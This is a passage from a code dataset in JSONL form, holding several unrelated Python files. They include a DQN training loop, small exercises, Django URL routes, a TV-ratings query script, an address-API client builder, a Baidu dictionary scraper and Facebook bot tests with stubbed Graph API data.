TARGET_UPDATE_FREQUENCY == 0:\n sess.run(copy_ops)\n\n total_reward += reward\n state = next_state\n step_count += 1\n\n if pre_episode % 100 == 0:\n print(\"Pre_Episode: {} steps: {} reward: {} esp: {}\".format(pre_episode, step_count, total_reward, e))\n env.render()\n # train\n \n for episode in range(MAX_EPISODES):\n #np.random.seed(int(time.time()))\n e = 1. / ((episode / 150) + 1)\n if e < 0.002:\n e = 0.002\n done = False\n step_count = 0\n state = env.reset()\n total_reward = 0\n\n if episode % 100 == 0:\n print(\"New episode==========================================\")\n\n while not done:\n if np.random.rand() < e:\n action = env.action_sample()\n else:\n # Choose an action by greedily from the Q-network\n action = np.argmax(mainDQN.predict(state))\n\n if episode % 100 == 0:\n print(\"state\", state)\n print(\"predict\", mainDQN.predict(state))\n # Get new state and reward from environment\n next_state, reward, done = env.step(action)\n\n # Save the experience to our buffer\n replay_buffer.append((state, action, reward, next_state, done))\n\n\n if len(replay_buffer) > BATCH_SIZE:\n minibatch = random.sample(replay_buffer, BATCH_SIZE)\n loss, _ = replay_train(mainDQN, targetDQN, minibatch)\n\n if step_count % TARGET_UPDATE_FREQUENCY == 0:\n sess.run(copy_ops)\n\n total_reward += reward\n state = next_state\n step_count += 1\n\n if episode % 100 == 0 or reward >= 0:\n print(\"Episode: {} steps: {} reward: {} esp: {}\".format(episode, step_count, total_reward, e))\n env.render()\n print(\"end episode==========================================\\n\\n\")\n\n if step_count == lec_info.total_time:\n Ehistory.append(episode)\n Rhistory.append(total_reward) \n\n # result\n bot_play(mainDQN, env)\n\n # show learning graph\n plt.plot(Ehistory, Rhistory)\n plt.show()\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"293395053","text":"#This project takes all multiples of 3 and 5 below 1000\n#and takes the sum of them\n\ntotal = 0\n\nfor i in range(1, 1000):\n if (i % 3) == 0 or (i % 5) == 0:\n total += i\n\nprint(str(total))","sub_path":"Project-Euler/Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"49528460","text":"\"\"\"Создали urls уровня приложения\"\"\"\nfrom django.urls import path\n\nfrom blog.views import post_list, post_detail\n\napp_name = 'blog' # Пространство имен приложения, должно быть уникальным по всему проекту\n\nurlpatterns = [\n path('////', post_detail, name='post_detail'),\n path('', post_list, name='post_list'), # name позволит нам обращаться к этому представлению из любой точки проекта\n # по имени (app_name : name) в нашем случае *** urls \"blog:post_list\" ***\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"600124116","text":"# coding: utf-8\n\"\"\"\nファイルの概要:各TVの欲しい階層の視聴率データを取得する。\nsetai,kozin,C,T,M1,M2,M3,F1,F2,F3の各層の視聴率データを取ってくる。\nなお、取ってくる時間帯はCM終了\n\"\"\"\nimport sys\nsys.path.append('../..') # daoを呼び出すため\nfrom util import dao # big_query からデータを持ってくる\nimport pandas as pd\nimport time\n\ndef get_target_rate(df):\n \"\"\"\n 関数の概要:big query から目的のデータを取ってくる。\n       この関数では、テレビの視聴率データを平均することで持ってくる。\n \"\"\"\n start_day = str(df[\"housou_day_s\"])\n end_day = str(df[\"housou_day_e\"])\n start_time = str(df[\"time_s\"])\n end_time = str(df[\"tim_(e\"])\n media_id = df[\"media_id\"]\n query = \"SELECT AVG(setai),AVG(kozin),AVG(child0412),AVG(child1319),AVG(M1),AVG(M2),AVG(M3),AVG(F1),AVG(F2),AVG(F3) \"+ \"FROM vr_minute WHERE media_id='\" + media_id\n\n # 日にちをまたいでいるかどうかでこの後が変わる。\n if start_day != end_day:\n query += \"' AND (housou_day = '\" + start_day + \"' AND time >= \"+start_time + \") OR (housou_day = '\" + end_day + \"' AND time<= \" + end_time + \")\"\n else:\n query += \"' AND housou_day = '\" + start_day + \"' AND time>=\"+start_time+\" AND time<=\"+end_time\n df = dao.read_sql_data(query, db_type='db_prod_kanto')\n # エラー処理\n if len(df.values)==0: return [\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\"]\n return df.values[0].tolist()\n\n# メインの処理\nif __name__ == \"__main__\":\n start = time.time() # プログラム開始時間\n year_month = sys.argv[1]\n # データの読み込み\n VRinfo = pd.read_csv('A_time/CM/prepro_' + year_month + '.csv')\n ten_col = ['media_id', 'housou_day_s', 'housou_day_e', 'time_s','time_e',\n 'id','ken_id','keishiki', 'nettype', 'shubetu']\n VR_tmp = VRinfo.loc[:,ten_col] # 欲しいデータのタイプに合わせて10���ラムにする。\n colname = [\"setai\",\"kozin\",\"C\",\"T\",\"M1\",\"M2\",\"M3\",\"F1\",\"F2\",\"F3\"]\n\n # 指定した時間帯の欲しい視聴率をとってくる。\n df_VR_rate = VR_tmp.apply(lambda x:get_target_rate(x), axis=1)\n colname = [colname[i]+\"_rate\" for i in range(len(colname))]\n df_VR_rate.columns = colname\n df_VR_rate.to_csv('A_time/rate/' + year_month + '_ave_vr_rate.csv', index = False)\n print(\"{} [ave VR]開始から {:.2f}[s] の時間が経ちました。CMの数は{}です。\".format(year_month, time.time()-start, len(VRinfo)))\n","sub_path":"ave_rate.py","file_name":"ave_rate.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"471829000","text":"import smartystreets_python_sdk as smarty\nfrom .client import Client\n\n\nclass ClientBuilder:\n def __init__(self, signer):\n self.signer = signer\n self.serializer = smarty.StandardSerializer()\n self.http_sender = None\n self.max_retries = 5\n self.max_timeout = 10000\n self.url_prefix = \"https://us-zipcode.api.smartystreets.com/lookup\"\n\n def retry_at_most(self, max_retries):\n self.max_retries = max_retries\n return self\n\n def with_max_timeout(self, max_timeout):\n self.max_timeout = max_timeout\n return self\n\n def with_serializer(self, serializer):\n self.serializer = serializer\n return self\n\n def with_url(self, url_prefix):\n self.url_prefix = url_prefix\n return self\n\n def build(self):\n return Client(self.build_sender(), self.serializer)\n\n def build_sender(self):\n if self.http_sender is not None:\n return self.http_sender\n\n sender = smarty.RequestsSender(self.max_timeout)\n\n sender = smarty.StatusCodeSender(sender)\n\n if self.signer is not None:\n sender = smarty.SigningSender(self.signer, sender)\n\n if self.max_retries > 0:\n sender = smarty.RetrySender(self.max_retries, sender)\n\n sender = smarty.URLPrefixSender(self.url_prefix, sender)\n\n return sender\n","sub_path":"smartystreets_python_sdk/us_zipcode/client_builder.py","file_name":"client_builder.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"646443251","text":"#Preston Knibbe\n#B7\n#pknibbe3@gatech.edu\n#903074340\n#I worked on the homework assignment alone, using this semester's course materials\n\nfrom Myro import *\n\ninit(\"com12\")\n\ndef getValues(numSamples):\n numSamples = int(numSamples)\n if numSamples == 1:\n a = getLight(\"center\")\n return a\n else:\n a = []\n for x in xrange(numSamples):\n a.append(getLight(\"center\"))\n turnLeft(1, .25)\n return a\n\ndef even(x):\n if x % 2 == 0:\n return True\n else:\n return False\n\ndef printStatistics(a):\n avg = sum(a)/len(a)\n maxi = max(a)\n mini = min(a)\n count = 0\n for x in a:\n if even(x):\n count = count + 1\n print(\"The average of this list is \",avg,\" the max is \",maxi,\" the min is \",mini,\" and the number of even numbers is \", count)\n","sub_path":"ra_lists.py","file_name":"ra_lists.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462726861","text":"# -*-coding: utf-8-*-\n# Author : Christopher Lee\n# License: Apache License\n# File : baidu.py\n# Date : 2017-04-14 14-10\n# Version: 0.0.1\n# Description: description of this file.\n\nimport datetime\nimport os\n\nfrom lxml.html import fromstring\nfrom ..common.storage import (SQLiteStorage, NullStorage,\n NULL_STORAGE, SQLITE_STORAGE)\nfrom ..common.downloader import Downloader\n\n__version__ = '0.0.1'\n__author__ = 'Chris'\n\n_dict_directory = os.path.abspath(os.path.dirname(__file__))\n\n\nclass BaiduChineseWordPageParser(object):\n def __init__(self, page_content):\n self._tree = fromstring(page_content)\n\n @property\n def pronunciation(self):\n try:\n p = (self._tree.xpath(\"//div[@id='pinyin']/h2/span/b/text()\")[0]).strip()\n return p.replace('[', '').replace(']', '')\n except:\n return ''\n\n @property\n def paraphrase(self):\n try:\n return ''.join(x.strip() for x in self._tree.xpath(\"//div[@id='basicmean-wrapper']/div[1]/text()\"))\n except:\n return ''\n\n @property\n def synonyms(self):\n try:\n return ' '.join(x.strip() for x in self._tree.xpath(\"//div[@id='synonym']//a/text()\"))\n except:\n return ''\n\n @property\n def antonyms(self):\n try:\n return ' '.join(x.strip() for x in self._tree.xpath(\"//div[@id='antonym']//a/text()\"))\n except:\n return ''\n\n @property\n def translation(self):\n try:\n return ''.join(x.strip() for x in self._tree.xpath(\"//div[@id='fanyi-wrapper']/div[1]//text()\"))\n except:\n return ''\n\n\nclass BaiduChineseWordDictionary(object):\n \"\"\"\n Website: `http://hanyu.baidu.com/`.\n \"\"\"\n host = 'hanyu.baidu.com'\n timeout = 48\n parser = BaiduChineseWordPageParser\n\n def __init__(self, storage_filename='', storage_type=None):\n \"\"\"\n :param storage_filename: file or database name to save words and their details\n :param storage_type: NULL_STORAGE, SQLITE_STORAGE\n \"\"\"\n storage = {\n NULL_STORAGE: NullStorage,\n SQLITE_STORAGE: SQLiteStorage,\n }.get(storage_type, SQLiteStorage)\n\n self._storage = storage(storage_filename or os.path.join(_dict_directory, 'dict.db'))\n self._storage.prepare()\n\n self._downloader = Downloader(self.host)\n\n def query(self, word, check_storage=True, proxy=None):\n \"\"\"\n Query a word from Baidu HanYu website.\n\n :param word: `str` keyword to be queried.\n :param proxy:\n 1. http proxy: `http://user:password@host:port`\n 1. socks5 proxy: `socks://user:password@host:port`\n Note: run `pip3 install -U requests[socks]` before using socks proxy.\n :param check_storage: whether check local cache file before sending request to BaiduHanyu\n :return: details of this word.\n \"\"\"\n assert isinstance(word, str)\n assert len(word) >= 2, RuntimeError('Expected a word, not a character: {}'.format(word))\n\n word = word.strip()\n\n if check_storage is True:\n cache = self._storage.get(word)\n if cache is not None:\n return cache\n\n r = self._downloader.get(self.make_url(word), proxy=proxy, timeout=self.timeout)\n details = self._parse_page(word, r)\n\n if details:\n self._storage.set(word, details)\n\n return details\n\n def make_url(self, word):\n return 'http://{}/s?wd={}'.format(self.host, word)\n\n def _parse_page(self, word, response):\n try:\n parser = self.parser(response.content)\n\n return {\n 'word': word,\n 'pronunciation': parser.pronunciation,\n 'paraphrase': parser.paraphrase,\n 'synonyms': parser.synonyms,\n 'antonyms': parser.antonyms,\n 'translation': parser.translation,\n 'url': response.url,\n 'timestamp': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n }\n except Exception as err:\n print('{}: {}'.format(word, err))\n return None\n","sub_path":"dictionary/cn_dict/baidu.py","file_name":"baidu.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"369525071","text":"#! /usr/bin/env python\n\n# Outputs 1000 random preference votes on 5 alternatives a, b, c, d, e\n\nimport sys\nfout = sys.stdout\n\nimport random\nstart = range(5)\n\nfor i in xrange(1000):\n random.shuffle(start)\n fout.write(' > '.join(chr(ord('a')+x) for x in start) + \"\\n\")\n","sub_path":"uniform.py","file_name":"uniform.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"256677164","text":"class Glass:\n capacity = 250\n\n def __init__(self):\n self.content = 0\n\n def fill(self, ml):\n if self.content + ml > self.capacity:\n return f\"Cannot add {ml} ml\"\n self.content += ml\n return f\"Glass filled with {ml} ml\"\n\n def empty(self):\n self.content = 0\n return f\"Glass is now empty\"\n\n def info(self):\n return f\"{Glass.capacity - self.content} ml left\"\n\n\nglass = Glass()\nprint(glass.capacity)\nGlass.capacity = 6000\nprint(glass.capacity)\nglass_2 = Glass()\nprint(glass_2.capacity)\n","sub_path":"glass.py","file_name":"glass.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"314467936","text":"#!/usr/bin/env python3\n\nimport asyncio\nimport unittest\nimport logging\n\nimport insteonplm\n\n@asyncio.coroutine\ndef test():\n log = logging.getLogger(__name__)\n\n def log_callback(message):\n log.info('Callback invoked: %s' % message)\n\n device = '/dev/ttyUSB0'\n\n log.info('Connecting to PLM on %s', device)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())\n","sub_path":"tests/fulltests.py","file_name":"fulltests.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"267713135","text":"import discord\n\nimport jim.config as config\nfrom jim import registrations\nfrom jim.util import util\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_ready():\n print('Logged in as %s (%s)' % (client.user.name, client.user.id,))\n registrations.register_cmds()\n registrations.register_patterns()\n\n\n# @client.event\n# async def on_member_update(_, after):\n# await twitch.notify(client, after)\n\n\n@client.event\nasync def on_message(message):\n if (message.guild is not None and message.author == message.guild.me) or len(message.content) < 1:\n return\n\n if util.is_command(message):\n print(\"%s sent command %s\" % (message.author.name, message.content,))\n if util.check_permissions(message):\n response = await util.run_command(client, message)\n if util.send_to_pm(message):\n await message.author.send(response)\n else:\n await message.channel.send(response)\n else:\n await message.channel.send(\"You do not have permission to use this command.\")\n\n res = await util.check_patterns(client, message)\n if res is not None:\n await message.channel.send(res)\n\n\ndef main():\n client.run(config.config_get(\"general\", \"user_token\"))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"jim/scripts/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"490827403","text":"\"\"\"\nReceived {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'item': u'post', u'verb': u'add', u'sender_id': 100008124789809, u'post_id': 814165888607693}}], u'id': u'757899520900997', u'time': 1405417187}], u'object': u'page'}\nGot post: {'created_time': '2014-07-15T09:39:47+0000', 'message': 'A new post on a new page', 'id': '757899520900997_814165888607693'}\nPushed {'channels': ['53c3ec19cea0992596520960'], 'user_profile': {'user_name': 'Mnt Poster'}, 'url': 'https://www.facebook.com/757899520900997/posts/814165888607693', 'sender_id': '100008124789809', 'content': 'A new post on a new page', 'facebook': {'created_at': '2014-07-15T09:39:47+0000', 'facebook_post_id': '757899520900997_814165888607693', 'page_id': '757899520900997'}}\n\n\nReceived {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'item': u'post', u'verb': u'add', u'sender_id': 100008124789809, u'post_id': 814170268607255}}], u'id': u'757899520900997', u'time': 1405418183}], u'object': u'page'}\nGot post: {'created_time': '2014-07-15T09:56:23+0000', 'message': 'Another new post on a new page', 'id': '757899520900997_814170268607255'}\nPushed {'channels': ['53c3ec19cea0992596520960'], 'user_profile': {'user_name': 'Mnt Poster'}, 'url': 'https://www.facebook.com/757899520900997/posts/814170268607255', 'sender_id': '100008124789809', 'content': 'Another new post on a new page', 'facebook': {'created_at': '2014-07-15T09:56:23+0000', 'facebook_post_id': '757899520900997_814170268607255', 'page_id': '757899520900997'}}\n\"\"\"\nimport json\nimport facebook\nimport time\nimport unittest\n\nfrom solariat_bottle.tests.base import BaseCase\nfrom solariat_bottle.daemons.facebook.facebook_client import FacebookBot\nfrom solariat_bottle.db.post.facebook import FacebookPost, parse_datetime\nfrom solariat_bottle.db.channel.facebook import EnterpriseFacebookChannel, FacebookServiceChannel\nfrom solariat_bottle.db.user_profiles.user_profile import UserProfile\nfrom solariat_bottle.utils import facebook_driver\n\n\nclass GraphAPIStub(object):\n \"\"\"\n Stub class for actual GraphAPI to avoid facebook direct interaction during post processing.\n \"\"\"\n ME_ACCOUNT = {'data': [{'access_token': 'CAAUaxYoDeUsBALC4RAptECIs2QpMe41VIi3knQpPUZB4VGx8ALgQFO813DJxjYe9xSkEVSnl3bu6kfyjVZCpuGWN9mk053PCoF3Emi4ZB7ZBkmZAkbTkZAS8S1sT5RavkLkrwiZAnvsk3DR57LzfCb1aGn17pcTs0RWLu6LUrFN9LRyiwpKUdQd',\n 'category': 'Community',\n 'id': '708605282549671',\n 'name': 'Solariat Dev Page',\n 'perms': ['ADMINISTER',\n 'EDIT_PROFILE',\n 'CREATE_CONTENT',\n 'MODERATE_CONTENT',\n 'CREATE_ADS',\n 'BASIC_ADMIN']}],\n 'paging': {'next': 'https://graph.facebook.com/v1.0/100005966506625/accounts?access_token=CAAUaxYoDeUsBAAVKaPUXDNLBysNeH3ob91Ey56UkTqpIsmjiUYtkyMMRZAwnWCLER3RScVIKEPOOBZBaHk49EvZCNR1ATfrZBP9te3ccwyAsU0zPScFUpLiL7EgZCqmrc208hmJXKWeUGuyQUZBxHaI69QPE9FWZBKGFZAkojqQLoXo7SJC37qe9RvNbGsQtDOROl0kVKhCVkV7vbJaQkePHOhmHzbN9XvCOnjnPZAd5QNPmn2kgAtkIE&limit=1000&offset=1000&__after_id=enc_Aezq2b9HI6yxEkiRxl0syOatkUcs3xrVWsUgjfKKNWgQXuVj2-xvYsr6PT5b8W4XCcRdILZu0OxODAg0kLbl86cs'}}\n\n\n OBJECTS = [{'actions': [{'link': 'https://www.facebook.com/757899520900997/posts/814165888607693',\n 'name': 'Comment'},\n {'link': 'https://www.facebook.com/757899520900997/posts/814165888607693',\n 'name': 'Like'}],\n 'created_time': '2014-07-15T09:39:47+0000',\n 'from': {'id': '100008124789809',\n 'name': 'Mnt Poster'},\n 'id': '757899520900997_814165888607693',\n 'message': 'A new post on a new page',\n 'privacy': {'value': ''},\n 'to': {'data': [{'category': 'App page',\n 'id': '757899520900997',\n 'name': 'Monitor Solariat'}]},\n 'type': 'status',\n 'updated_time': '2014-07-15T09:39:47+0000'},\n\n {'actions': [{'link': 'https://www.facebook.com/757899520900997/posts/825258484165100',\n 'name': 'Comment'},\n {'link': 'https://www.facebook.com/757899520900997/posts/825258484165100',\n 'name': 'Like'}],\n 'created_time': '2014-07-15T09:39:49+0000',\n 'from': {'id': '100008124789809',\n 'name': 'Mnt Poster'},\n 'id': '757899520900997_825258484165100',\n 'message': 'Testing post-reply pair',\n 'privacy': {'value': ''},\n 'to': {'data': [{'category': 'App page',\n 'id': '757899520900997',\n 'name': 'Monitor Solariat'}]},\n 'type': 'status',\n 'updated_time': '2014-07-15T09:39:49+0000'},\n\n {'actions': [{'link': 'https://www.facebook.com/757899520900997/posts/825259480831667',\n 'name': 'Comment'},\n {'link': 'https://www.facebook.com/757899520900997/posts/825259480831667',\n 'name': 'Like'}],\n 'created_time': '2014-07-15T09:39:51+0000',\n 'from': {'id': '100008124789809',\n 'name': 'Mnt Poster'},\n 'id': '825258484165100_825259480831667',\n 'message': 'Thanks for reaching out. Testing scenario',\n 'privacy': {'value': ''},\n 'to': {'data': [{'category': 'App page',\n 'id': '757899520900997',\n 'name': 'Poster Solariat'}]},\n 'type': 'status',\n 'updated_time': '2014-07-15T09:39:51+0000'},\n\n {'first_name': 'Mnt1',\n 'gender': 'female',\n 'id': '100008124789809',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008124789809',\n 'locale': 'en_US',\n 'name': 'Mnt Poster',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'},\n\n {'first_name': 'Mnt',\n 'gender': 'female',\n 'id': '100008145211355',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008145211355',\n 'locale': 'en_US',\n 'name': 'Mnt Creator',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'},\n\n ]\n\n def __init__(self, access_token=None, timeout=None, version=None, channel=None):\n self.access_token = access_token\n self.timeout = timeout\n\n def get_object(self, object_id, **kwargs):\n if '/picture' in object_id:\n return {}\n if object_id == '/me/accounts':\n return self.ME_ACCOUNT\n for post in self.OBJECTS:\n if post['id'] == object_id:\n if 'fields' in kwargs:\n return {field: post.get(field, \"\") for field in kwargs['fields'].split(',') + ['id']}\n else:\n return post\n raise facebook.GraphAPIError({\"error\": {\"message\": \"(#803) Some of the aliases you requested do not exist: %s\" % object_id,\n \"type\": \"OAuthException\",\n \"code\": 803}})\n\n def request(self, *args, **kwargs):\n # Nothing to do here for now, we can't register for realtime updates in test environment\n pass\n\n\nFACEBOOK_DATA = {u'entry': [{u'changes': [{u'field': u'feed',\n u'value': {u'item': u'post',\n u'verb': u'add',\n u'sender_id': 100008124789809,\n u'post_id': 814165888607693}}],\n u'id': u'757899520900997',\n u'time': 1405417187}],\n u'object': u'page'}\n\nMAX_TIMEOUT = 5\n\n\n\n@unittest.skip(\"No longer use python based bot\")\nclass FacebookBotCase(BaseCase):\n\n def setUp(self):\n self.real_api = facebook_driver.GraphAPI\n facebook_driver.GraphAPI = GraphAPIStub\n super(FacebookBotCase, self).setUp()\n self.fb_bot = FacebookBot(username=self.user.email,\n lockfile=\"fb_bot_test_lockfile\",\n concurrency=2,\n heartbeat=1)\n\n def tearDown(self):\n facebook_driver.GraphAPI = self.real_api\n self.fb_bot.stop()\n\n def test_one_post_happy_flow(self):\n \"\"\" Just a basic test of the main flow. Start a datasift bot, pass it some datasift data that\n would get matched in our system, check that it's actually created and matched properly. \"\"\"\n efc_channel = EnterpriseFacebookChannel.objects.create_by_user(self.user, title=\"FB_ACC\")\n efc_channel.facebook_access_token = 'test'\n srv_channel = FacebookServiceChannel.objects.create_by_user(self.user, title='FB_INB')\n\n page_id = FACEBOOK_DATA['entry'][0]['id']\n srv_channel.facebook_page_ids.append(page_id)\n efc_channel.facebook_page_ids.append(page_id)\n srv_channel.on_active()\n efc_channel.on_active()\n srv_channel.save()\n efc_channel.save()\n\n self.assertEqual(FacebookPost.objects.count(), 0)\n\n self.fb_bot.start()\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if self.fb_bot.is_running():\n break\n else:\n self.fail(\"Bot never got started after waiting %s seconds.\" % MAX_TIMEOUT)\n\n self.fb_bot.post_received(json.dumps(FACEBOOK_DATA))\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if not (self.fb_bot.is_busy() or self.fb_bot.is_blocked()):\n break\n else:\n self.fail(\"Post processing did not finish after waiting %s seconds\" % MAX_TIMEOUT)\n\n self.assertEqual(FacebookPost.objects.count(), 1)\n created_post = FacebookPost.objects.find_one()\n expected_create_time = parse_datetime('2014-07-15T09:39:47+0000')\n self.assertEqual(expected_create_time, created_post.created_at)\n self.assertTrue(isinstance(created_post.user_profile, UserProfile))\n self.assertDictEqual(created_post.user_profile.platform_data,\n {'first_name': 'Mnt1',\n 'gender': 'female',\n 'id': '100008124789809',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008124789809',\n 'locale': 'en_US',\n 'name': 'Mnt Poster',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'})\n self.assertEqual(created_post.content, 'A new post on a new page')\n self.assertTrue(str(srv_channel.inbound_channel.id) in created_post.channel_assignments)\n self.assertEqual(created_post.channel_assignments[str(srv_channel.inbound_channel.id)], 'highlighted')\n self.assertDictEqual(created_post.wrapped_data,\n {u'expanded_height': u'',\n u'via': u'',\n u'attachments': u'',\n u'icon': u'',\n u'feed_targeting': u'',\n u'actions': [{u'link': u'https://www.facebook.com/757899520900997/posts/814165888607693',\n u'name': u'Comment'},\n {u'link': u'https://www.facebook.com/757899520900997/posts/814165888607693',\n u'name': u'Like'}],\n u'height': u'',\n u'promotion_status': u'',\n u'shares': u'',\n u'created_time': u'2014-07-15T09:39:47+0000',\n u'is_hidden': u'',\n u'id': u'757899520900997_814165888607693',\n u'to': {u'data': [{u'category': u'App page',\n u'id': u'757899520900997',\n u'name': u'Monitor Solariat'}]},\n u'description': u'',\n u'story': u'',\n u'from': {u'id': u'100008124789809',\n u'name': u'Mnt Poster'},\n u'privacy': {u'value': u''},\n u'object_id': u'',\n u'application': u'',\n u'expanded_width': u'',\n u'parent_id': u'',\n u'story_tags': u'',\n u'coordinates': u'',\n u'type': u'status',\n u'status_type': u'',\n u'is_popular': u'',\n u'picture': u'',\n u'scheduled_publish_time': u'',\n u'full_picture': u'',\n u'link': u'',\n u'targeting': u'',\n u'timeline_visibility': u'',\n u'properties': u'',\n u'insights': u'',\n u'name': u'',\n u'comments_mirroring_domain': u'',\n u'call_to_action': u'',\n u'with_tags': u'',\n u'message': u'A new post on a new page',\n u'message_tags': u'',\n u'updated_time': u'2014-07-15T09:39:47+0000',\n u'caption': u'',\n u'place': u'',\n u'source': u'',\n u'child_attachments': u'',\n u'is_published': u'',\n u'width': u'',\n u'likes': u''})\n\n self.fb_bot.stop()\n\n for idx in xrange(MAX_TIMEOUT * 4):\n time.sleep(1)\n if not self.fb_bot.isAlive():\n break\n else:\n self.fail(\"Bot never stopped after waiting %s seconds.\" % (4 * MAX_TIMEOUT))\n\n def test_post_reply(self):\n \"\"\"\n Received {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'item': u'post', u'verb': u'add', u'sender_id': 100008124789809, u'post_id': u'757899520900997_825258484165100'}}], u'id': u'757899520900997', u'time': 1407237249}], u'object': u'page'}\n Got post: {'created_time': '2014-08-05T11:14:09+0000', 'message': 'Testing post-reply pair', 'id': '757899520900997_825258484165100'}\n Pushed {'channels': ['53e0bbf4cea0991f3be1fd17'], 'user_profile': {'user_name': 'Mnt Poster'}, 'url': 'https://www.facebook.com/757899520900997/posts/825258484165100', 'content': 'Testing post-reply pair', 'facebook': {'created_at': '2014-08-05T11:14:09+0000', 'facebook_post_id': '757899520900997_825258484165100', 'page_id': '757899520900997'}}\n\n Received {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'parent_id': u'757899520900997_825258484165100', u'comment_id': u'825258484165100_825259480831667', u'sender_id': 100008145211355, u'item': u'comment', u'verb': u'add', u'created_time': 1407237438}}], u'id': u'757899520900997', u'time': 1407237438}], u'object': u'page'}\n Got comment: {'created_time': '2014-08-05T11:17:17+0000', 'message': 'Thanks for reaching out. Testing scenario ', 'id': '825258484165100_825259480831667'}\n Pushed {'channels': ['53e0bbf4cea0991f3be1fd18'], 'user_profile': {'user_name': 'Mnt Creator'}, 'url': 'https://www.facebook.com/permalink.php?comment_id=757899520900997_825258484165100&story_fbid=825258484165100&id=757899520900997&reply_comment_id=825259480831667', 'content': 'Thanks for reaching out. Testing scenario ', 'facebook': {'in_reply_to_status_id': '757899520900997_757899520900997_825258484165100', 'facebook_post_id': '825258484165100_825259480831667', 'page_id': '757899520900997', 'created_at': '2014-08-05T11:17:17+0000'}}\n \"\"\"\n post_data = {u'entry': [{u'changes': [{u'field': u'feed',\n u'value': {u'item': u'post',\n u'verb': u'add',\n u'sender_id': 100008124789809,\n u'post_id': u'757899520900997_825258484165100'}}],\n u'id': u'757899520900997',\n u'time': 1407237249}],\n u'object': u'page'}\n reply_data = {u'entry': [{u'changes': [{u'field': u'feed',\n u'value': {u'parent_id': u'757899520900997_825258484165100',\n u'comment_id': u'825258484165100_825259480831667',\n u'sender_id': 100008145211355,\n u'item': u'comment',\n u'verb': u'add',\n u'created_time': 1407237438}}],\n u'id': u'757899520900997',\n u'time': 1407237438}],\n u'object': u'page'}\n\n efc_channel = EnterpriseFacebookChannel.objects.create_by_user(self.user, title=\"FB_ACC\")\n efc_channel.facebook_access_token = \"test\"\n srv_channel = FacebookServiceChannel.objects.create_by_user(self.user, title='FB_INB')\n\n page_id = post_data['entry'][0]['id']\n srv_channel.facebook_page_ids.append(page_id)\n efc_channel.facebook_page_ids.append(page_id)\n efc_channel.facebook_handle_id = str(reply_data['entry'][0]['changes'][0]['value']['sender_id'])\n srv_channel.on_active()\n efc_channel.on_active()\n srv_channel.save()\n efc_channel.save()\n\n self.assertEqual(FacebookPost.objects.count(), 0)\n\n self.fb_bot.start()\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if self.fb_bot.is_running():\n break\n else:\n self.fail(\"Bot never got started after waiting %s seconds.\" % MAX_TIMEOUT)\n\n self.fb_bot.post_received(json.dumps(post_data))\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if not (self.fb_bot.is_busy() or self.fb_bot.is_blocked()):\n break\n else:\n self.fail(\"Post processing did not finish after waiting %s seconds\" % MAX_TIMEOUT)\n\n self.assertEqual(FacebookPost.objects.count(), 1)\n created_post = FacebookPost.objects.find_one()\n self.assertTrue(isinstance(created_post.user_profile, UserProfile))\n self.assertDictEqual(created_post.user_profile.platform_data,\n {'first_name': 'Mnt1',\n 'gender': 